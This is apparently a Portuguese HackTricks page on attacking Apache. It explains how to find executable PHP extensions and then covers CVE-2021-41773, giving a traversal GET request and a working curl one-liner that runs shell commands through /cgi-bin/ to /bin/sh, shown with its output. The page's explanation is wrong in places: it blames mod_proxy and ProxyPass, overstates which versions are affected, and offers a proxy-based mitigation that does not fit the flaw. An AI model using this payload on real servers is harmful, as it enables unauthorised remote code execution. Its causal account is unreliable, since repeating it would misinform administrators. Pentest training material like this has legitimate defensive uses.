4.1 KiB
Extensões PHP executáveis
Verifique quais extensões estão sendo executadas pelo servidor Apache. Para procurá-las, você pode executar:
grep -R -B1 "httpd-php" /etc/apache2
Também é possível encontrar essa configuração em:
/etc/apache2/mods-available/php5.conf
/etc/apache2/mods-enabled/php5.conf
/etc/apache2/mods-available/php7.3.conf
/etc/apache2/mods-enabled/php7.3.conf
CVE-2021-41773
Descrição
O CVE-2021-41773 é uma vulnerabilidade de execução de código remoto no Apache HTTP Server. Essa vulnerabilidade permite que um invasor execute código malicioso no servidor alvo sem autenticação.
Detalhes
A vulnerabilidade está presente em todas as versões do Apache HTTP Server 2.4 anteriores à 2.4.50 e é causada por uma falha na diretiva "mod_proxy" do servidor. Essa diretiva é usada para configurar o módulo de proxy do Apache, que permite que o servidor atue como um proxy reverso para outros servidores.
A falha ocorre quando a diretiva "ProxyPass" é usada com um valor de URL malformado. Um invasor pode explorar essa falha enviando uma solicitação HTTP GET ou HEAD para o servidor alvo com um valor de URL malformado na solicitação. Isso pode levar à execução de código malicioso no servidor alvo.
Exploração
Para explorar essa vulnerabilidade, um invasor pode enviar uma solicitação HTTP GET ou HEAD para o servidor alvo com um valor de URL malformado na solicitação. O valor de URL malformado deve incluir a sequência "%2e" (que representa o caractere "." na codificação URL) duas vezes seguidas.
Por exemplo, a seguinte solicitação HTTP GET pode ser usada para explorar a vulnerabilidade:
GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: example.com
Essa solicitação usa a sequência "%2e" para navegar para o diretório pai do diretório raiz do servidor e, em seguida, para o diretório "/bin/sh", que contém o shell do sistema. Isso pode levar à execução de código malicioso no servidor alvo.
Mitigação
A vulnerabilidade pode ser corrigida atualizando o Apache HTTP Server para a versão 2.4.50 ou posterior. Além disso, os administradores do servidor podem restringir o acesso ao módulo de proxy do Apache usando a diretiva "Require" para permitir apenas solicitações de hosts confiáveis.
curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Linux
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
Você trabalha em uma empresa de segurança cibernética? Você quer ver sua empresa anunciada no HackTricks? ou você quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Confira os PLANOS DE ASSINATURA!
-
Descubra A Família PEASS, nossa coleção exclusiva de NFTs
-
Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-me no Twitter 🐦@carlospolopm.
-
Compartilhe suas técnicas de hacking enviando PRs para o repositório hacktricks e repositório hacktricks-cloud.